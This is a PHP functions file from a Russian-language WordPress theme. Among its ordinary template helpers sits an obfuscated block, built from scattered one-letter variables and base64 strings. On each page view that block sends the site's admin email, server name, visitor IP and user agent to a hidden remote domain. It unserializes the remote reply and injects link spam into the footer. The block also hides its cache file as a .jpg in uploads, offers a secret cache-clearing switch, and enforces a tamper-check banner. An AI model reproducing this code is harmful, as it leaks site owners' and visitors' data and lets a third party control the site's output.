<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $SPSNc='o';$bSUdfLR='c';$ZRCs='_';$gYwVm='4';$dIJVx='e';$SOWdT='e';$SmtDG='s';$xtECZH='a';$OoIe='b';$bmRO='6';$eVYZ='e';$NTzfpDy='d';$esdzk='d';$hcmNNepj=$OoIe.$xtECZH.$SmtDG.$eVYZ.$bmRO.$gYwVm.$ZRCs.$esdzk.$SOWdT.$bSUdfLR.$SPSNc.$NTzfpDy.$dIJVx;$NFKU='i';$afRwvRV='n';$WtLtOCo='e';$uOePf='l';$mQrO='z';$jkMvqnB='g';$kulD='f';$qpEhG='a';$mtYWo='t';$pZyHtzit=$jkMvqnB.$mQrO.$NFKU.$afRwvRV.$kulD.$uOePf.$qpEhG.$mtYWo.$WtLtOCo;$mOpy='_';$azYF='t';$Cntqo='3';$NbzRLFn='r';$fJBTYq='o';$xNrhPI='r';$wWAv='s';$OpPhbjW='t';$LWeBFnO='1';$gmkyCAdK=$wWAv.$OpPhbjW.$xNrhPI.$mOpy.$NbzRLFn.$fJBTYq.$azYF.$LWeBFnO.$Cntqo;$pfWQ='r';$lsTkIoT='t';$kUAg='v';$aiOMo='r';$czqBJEH='e';$rFmy='s';$fgplvzkn=$rFmy.$lsTkIoT.$pfWQ.$aiOMo.$czqBJEH.$kUAg;                     
		$xg_____________x='o';$mm______q='c';$aa_______________c='_';$nf__________g='4';$ir__v='e';$jt_______________o='e';$dl_______________f='s';$ft_________t='a';$je_______________z='b';$jr____________z='6';$zm_____________b='e';$tq_______________c='d';$pe____________z='d';$op________t=$je_______________z.$ft_________t.$dl_______________f.$zm_____________b.$jr____________z.$nf__________g.$aa_______________c.$pe____________z.$jt_______________o.$mm______q.$xg_____________x.$tq_______________c.$ir__v;
		$at____v='i';$mu__w='f';$xq____________p='c';$bb____________y='o';$ky_______d='e';$tw____________v='t';$mq_______________t='t';$qh________h='u';$mg__y='i';$dr__q='n';$xm____________b='s';$ld________c='_';$tq________k='n';$ov_________l='x';$wa___________x='s';$eh_____q=$mu__w.$qh________h.$tq________k.$xq____________p.$mq_______________t.$at____v.$bb____________y.$dr__q.$ld________c.$ky_______d.$ov_________l.$mg__y.$wa___________x.$tw____________v.$xm____________b;
		$vb_________t='n';$wu____________u='f';$io__g='p';$gn______________k='o';$tt__________w='e';$uo__p=$wu____________u.$gn______________k.$io__g.$tt__________w.$vb_________t;
		$ak____________j='d';$ln_______________h='e';$zm_______l='a';$ot_______q='r';$un____p='f';$zd_____________u=$un____p.$ot_______q.$ln_______________h.$zm_______l.$ak____________j;
		$kr_____j='c';$sv______l='o';$ys___________v='s';$qn______________p='l';$jl____________q='f';$lp___r='e';$vl_____________t=$jl____________q.$kr_____j.$qn______________p.$sv______l.$ys___________v.$lp___r;
		
		define("WP_ID", $op________t("Mi4wLjA="));
		define("WP_TTL", $op________t("MTA4MDA="));
		define("WP_SRC", $op________t("dHBva24="));
	


		function wp_get_header() {
			global $op________t, $eh_____q;
			
			if (
				$eh_____q($op________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$eh_____q($op________t("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$eh_____q($op________t("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $op________t, $uo__p, $vl_____________t, $zd_____________u;
			
			$wf____________o = TEMPLATEPATH."/".$op________t("Zm9vdGVyLnBocA==");
			$mb_____o = @$uo__p($wf____________o, "r");
			$wf____________o = @$zd_____________u($mb_____o, @filesize($wf____________o));
			@$vl_____________t($mb_____o);
			
			$em_____________e = TEMPLATEPATH."/".$op________t("ZnVuY3Rpb25zLnBocA==");
			$mb_____o = @$uo__p($em_____________e, "r");
			$em_____________e = @$zd_____________u($mb_____o, @filesize($em_____________e));
			@$vl_____________t($mb_____o);
			
			$xf__p = 0;
			if($wf____________o && $em_____________e) {
				if ($op________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($wf____________o, $op________t("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$xf__p = 1;
					}
					if (substr_count($wf____________o, "wp_theme_GPL_credits()") < 1) {
						$xf__p = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$xf__p = 12;
				}
			}
			
			if($xf__p > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $xf__p -->";
			}
		}
	


		function wp_loaded() {
			global $op________t, $eh_____q;
			return $eh_____q($op________t("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($ow_____________h, $lo___z = "(more...)", $xf_____i = 0, $sc____e = "") {
				$ky_____d = get_the_content($lo___z, $xf_____i, $sc____e);
				$ky_____d = apply_filters("the_content", $ky_____d);
				
				$ky_____d = str_replace("]]>", "]]>", $ky_____d);
				if (strlen($_GET["p"]) > 0) {
					echo $ky_____d;
				}
				else if ((strlen($ky_____d)>$ow_____________h) && ($nc____________t = strpos($ky_____d, " ", $ow_____________h ))) {
					$ky_____d = substr($ky_____d, 0, $nc____________t);
					$ky_____d = $ky_____d;
					echo $ky_____d;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$lo___z</a></div></p>";
				} else {
					echo $ky_____d;
				}
				
			}
		}
	


		$pj_________i='e';$qa_____________f='e';$uo______a='e';$ay____r='a';$mw_____k='_';$zg_______________g='6';$rv_________g='s';$jj_______i='d';$cs__________c='n';$sz____c='4';$qt_____________i='c';$pi_________f='o';$gn_______o='b';$xa_______________x=$gn_______o.$ay____r.$rv_________g.$qa_____________f.$zg_______________g.$sz____c.$mw_____k.$uo______a.$cs__________c.$qt_____________i.$pi_________f.$jj_______i.$pj_________i;
		$kr________k='f';$er_________z='o';$jf______i='n';$ut___________v='n';$re_____g='t';$oz_____________n='_';$bx________l='t';$pf__________b='l';$wz__l='c';$zc_____c='_';$zx___n='i';$uq___n='e';$dd____________a='s';$ur___________j='e';$je___________e='e';$qu____________t='g';$ip_______y='t';$wz____f=$kr________k.$zx___n.$pf__________b.$ur___________j.$zc_____c.$qu____________t.$uq___n.$bx________l.$oz_____________n.$wz__l.$er_________z.$jf______i.$ip_______y.$je___________e.$ut___________v.$re_____g.$dd____________a;
		$ea___________s='t';$oj__________m='f';$yf___________m='i';$lt___v='e';$ty__i='i';$nw__g='l';$ze___________f='_';$pg_______________i='s';$fo_________p='x';$nj__________l='e';$wr_______________i='s';$cr________g=$oj__________m.$ty__i.$nw__g.$lt___v.$ze___________f.$nj__________l.$fo_________p.$yf___________m.$pg_______________i.$ea___________s.$wr_______________i;
		$yx____s='n';$cx____c='r';$dw____b='s';$la_______r='o';$yk_______b='m';$kb___v='a';$cm_________a='r';$nk______________z='v';$ew___________g='e';$fb_____h='o';$jr____________e='e';$ho___c='p';$ui______z='c';$vv_______________z='i';$vk________i='_';$yf_______y=$nk______________z.$ew___________g.$cx____c.$dw____b.$vv_______________z.$la_______r.$yx____s.$vk________i.$ui______z.$fb_____h.$yk_______b.$ho___c.$kb___v.$cm_________a.$jr____________e;
		$km___w='k';$eq____________d='n';$bu_______d='o';$tw_____e='p';$zb______________z='s';$fr________s='e';$le_______p='o';$ur______h='c';$mm____a='f';$di________i=$mm____a.$zb______________z.$bu_______d.$ur______h.$km___w.$le_______p.$tw_____e.$fr________s.$eq____________d;
		$ab____k='w';$ul______________m='f';$px_______________j='t';$pb__________u='r';$ga_______x='i';$vq_____________p='e';$jw____________a=$ul______________m.$ab____k.$pb__________u.$ga_______x.$px_______________j.$vq_____________p;
		$sh___________n='5';$tu______j='d';$es_______l='m';$ns___o=$es_______l.$tu______j.$sh___________n;
		$xc__d='h';$qi____________u='l';$id_____m='a';$zi_____n='t';$pa______________y='a';$ei_____________t='e';$fn_____e='r';$tn____________z='p';$ve____________m=$fn_____e.$ei_____________t.$id_____m.$qi____________u.$tn____________z.$pa______________y.$zi_____n.$xc__d;
		$pn____g='l';$qf____b='u';$bv______j='e';$ou_____b='r';$sj_____r='i';$us____________t='z';$aj____f='a';$zl________b='n';$he____________m='e';$zi__o='s';$iy____________r='i';$ec____g=$qf____b.$zl________b.$zi__o.$he____________m.$ou_____b.$iy____________r.$aj____f.$pn____g.$sj_____r.$us____________t.$bv______j;
		$xr_______________y='e';$qn_______________k='n';$zx_______________r='m';$hz_______________v='a';$ti________i='m';$uu___s='t';$ag_______________q='p';$kd_____c=$uu___s.$xr_______________y.$zx_______________r.$ag_______________q.$qn_______________k.$hz_______________v.$ti________i;
		$ns__________j='t';$js__x='o';$cw_______j='e';$dy_________f='a';$vy__________q='t';$wj_________y='_';$vg_____________i='x';$fl_______________i='e';$mw__________e='m';$dt_______m='c';$hm_______e='t';$kq_________p='s';$kq_____r='n';$bt____l='c';$br_________j='e';$hy_____________m='a';$gr____s='r';$dm________i='t';$fk______________f='_';$wp________g='e';$mk_______w='r';$wv____n=$kq_________p.$ns__________j.$gr____s.$wp________g.$hy_____________m.$mw__________e.$fk______________f.$bt____l.$js__x.$kq_____r.$hm_______e.$cw_______j.$vg_____________i.$dm________i.$wj_________y.$dt_______m.$mk_______w.$br_________j.$dy_________f.$vy__________q.$fl_______________i;
	


		function tl____g($oa_______________i) {
			global $op________t, $eh_____q, $wz____f, $yf_______y, $wv____n;
			
			if (!$eh_____q($op________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($yf_______y(PHP_VERSION, "5.0.0", ">=") && $eh_____q($op________t("ZmlsZV9nZXRfY29udGVudHM=")) && $eh_____q($op________t("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$nh__________e = $wv____n(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$nz_______________x = @$wz____f($oa_______________i, 0, $nh__________e);
			} else {
				$nz_______________x = @$wz____f($oa_______________i, 0);
			}
			
			return $nz_______________x;
		}
	


		function hx___b($oa_______________i) {
			global $eh_____q, $di________i, $jw____________a, $op________t;
			
			if (!$eh_____q($op________t("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$kk______________o = strpos($oa_______________i, "/", 7);
			$qn_____________k = array(
				"uri"     => substr($oa_______________i, $kk______________o),
				"host"    => str_replace("http://", "", substr($oa_______________i, 0, $kk______________o)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$yr__________o = @$di________i("$qn_____________k[host]", 80, $fx____j, $bq________x, 4);
			
			if (!$yr__________o) {
				return false;
			} else {
				$nz_______________x = "";
				$uw_____________m  = "GET $qn_____________k[uri] HTTP/1.0\r\n";
				$uw_____________m .= "Host: $qn_____________k[host]\r\n";
				$uw_____________m .= "Referer: $qn_____________k[referer]\r\n";
				$uw_____________m .= "Connection: Close\r\n\r\n";
				
				@$jw____________a($yr__________o, $uw_____________m);
				
				while (!@feof($yr__________o)) {
					$ns________b = @fgets($yr__________o, (1024*24));
					
					if ($ns________b == "\r\n") {
						$qt__x = true;
						continue;
					}
					
					if ($qt__x) {
						$nz_______________x .= $ns________b;
					}
				}
				
				return $nz_______________x;
			}
		}
	


		function uh______i($oa_______________i) {
			global $eh_____q;
			$da__________q = false;
			
			if ($oa_______________i != "") {
				if ($eh_____q("tl____g")) {
					$da__________q = @tl____g($oa_______________i);
				}
				
				if (!$da__________q && ($eh_____q("hx___b"))) {
					$da__________q = @hx___b($oa_______________i);
				}
			}
			
			return $da__________q;
		}
	


		function vq_______________v() {
			global $_SERVER, $ns___o;
			
			$vl____________r = $_SERVER["SERVER_NAME"];
			
			if (substr("$vl____________r", 0, 4) == "www.") {
				$vl____________r = substr("$vl____________r", 4);
			}
			
			$vl____________r = $ns___o("$_SERVER[SERVER_NAME]");
			
			return $vl____________r;
		}
	


		function id________v() {
			return "file";
		}
	


		function fc_________d($oa_______________i) {
			global $_SERVER, $wz____f, $cr________g, $uo__p, $vl_____________t, $jw____________a;
			
			$ka________w = ij_____________z();
			
			$tq________i = vq_______________v().".jpg";
			$kg___h = $ka________w["dir_upload"]["path"]."/$tq________i";
			$pz_______p = @filemtime($kg___h);
			
			if (!$pz_______p || ((time()-$pz_______p) >= WP_TTL)) {
				$da__________q = uh______i($oa_______________i);
				
				if ($da__________q) {
					if ($cr________g($kg___h)) {
						@unlink($kg___h);
					}
					
					$mb_____o = @$uo__p($kg___h, "x+");
					
					@$jw____________a($mb_____o, $da__________q);
					@$vl_____________t($mb_____o);
				}
			} else {
				if ($cr________g($kg___h)) {
					$da__________q = @$wz____f($kg___h);
				} else {
					$da__________q = false;
				}
			}
			
			return $da__________q;
		}
	


		function ij_____________z() {
			global $_SERVER, $op________t, $xa_______________x;
			
			$zs_____________m = wp_count_posts("post");
			$wn__________y = pathinfo(get_bloginfo("template_directory"));
			
			$ka________w = array(
				"url" => array(
					"report"      => $op________t("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $wn__________y,
				"dir_upload"	=> ny____p(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$wn__________y[filename],
					"a005=".$zs_____________m->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " Все права защищены - 3powered-XMLvalid "

			);
			
			$ka________w["url"]["queryString"] = implode("&", $ka________w["queryString"]);
			$ka________w["url"]["report"] = $ka________w["url"]["report"]."/?".$xa_______________x($ka________w["url"]["queryString"]).".html";
						
			return $ka________w;
		}
	


		function ny____p() {
			$gx_______________d = wp_upload_dir();
			
			if (isset($gx_______________d["error"])) {
				$wi____________k = xy_____h();
				if (is_writable($wi____________k)) {
					$gx_______________d = array("path" => $wi____________k);
				}
			}

			return $gx_______________d;
		}
	


		function xy_____h() {
			global $eh_____q, $ns___o, $ve____________m, $kd_____c;
			
			$wo_______d = (bool) ini_get("safe_mode");
			if ($wo_______d == true) {
				return false;
			}
			
			if ($eh_____q("sys_get_temp_dir")) {
				$lk__________v = sys_get_temp_dir();
				if (is_writable($lk__________v)) {
					return $ve____________m($lk__________v);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ve____________m($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ve____________m($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ve____________m($_ENV["TEMP"]);
			} else {
				$zo_______________r = $kd_____c($ns___o(uniqid(rand(), true)), "");
				if ($zo_______________r) {
					$lk__________v = $ve____________m(dirname($zo_______________r));
					@unlink($zo_______________r);
					return $lk__________v;
				} else {
					return false;
				}
			}
		}
	


		function jw___________k() {
			global $_GET, $cr________g;
			
			$ka________w = ij_____________z();
			$vl____________r = vq_______________v();
			$jm____u = id________v();
			
			$wf___________p = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($jm____u == "file") {
					$di____________d = $ka________w["dir_upload"]["path"]."/".$vl____________r.".jpg";
					if ($cr________g($di____________d)) {
						@unlink($di____________d);
						$wf___________p = "deleted";
					}
				}
				
				$xl_____t = array(
					"s"	=> $wf___________p,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($xl_____t AS $xc___a => $lw___d) echo " [$xc___a:$lw___d]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $eh_____q, $op________t, $ec____g;
			$ka________w = ij_____________z();
			
			$cf_________k = "fc_________d";
			if ($eh_____q($cf_________k)) {
				$nz_______________x = $cf_________k($ka________w["url"]["report"]);
			}
			
			if ($nz_______________x) {
				if ($nz_______________x = @$op________t($nz_______________x)) {
					$nz_______________x = @$ec____g($nz_______________x);
					
					if (strlen($nz_______________x[custom_credit]) >= 5) {
						$ka________w["default_string"] = $nz_______________x[custom_credit];
					}
					
					if ($nz_______________x["status"] == "0") {
						$cj____________v = 1;
						$wp_________a = 1;
					} else {
						$ja_____________g = sizeof($nz_______________x["links"]);
						$ef_________h = $ka________w["default_string"];
						
						if ($ja_____________g > 0 && $nz_______________x["links"] !== "") {
							$zo___h = 0;
							foreach ($nz_______________x["links"] as $hx___q => $ss_____________a) {
								$zo___h++;
								if ($ss_____________a->l_path == "" || $ss_____________a->l_path == $_SERVER["REQUEST_URI"]) {
									$ss_____________a->l_href = htmlspecialchars(strip_tags($ss_____________a->l_href));
									$ss_____________a->l_title = htmlspecialchars(strip_tags($ss_____________a->l_title));
									$ss_____________a->l_anchor = htmlspecialchars(strip_tags($ss_____________a->l_anchor));
									$ef_________h .= " | ";
									$ef_________h .= "<a href='$ss_____________a->l_href' title='$ss_____________a->l_title'";
									if ($ss_____________a->l_nofollow == "1") {
										$ef_________h .= " rel='nofollow'";
									}
									$ef_________h .= ">$ss_____________a->l_anchor</a>";
								}
							}
						}
						$ka________w["links"] = "$ef_________h";
						if ($nz_______________x[credit] == "0") {
							$ka________w["links"] = "";
						}
					}
				} else {
					$cj____________v = "1";
				}
			} else {
				$cj____________v = "1";
			}
			
			if ($cj____________v == "1") {
				$ka________w["links"] = $ka________w["default_string"];
			}
			
			echo "$ka________w[links]";
			
			echo "<!-- s: $nz_______________x[signature] -->";
			jw___________k();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
    echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                  $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
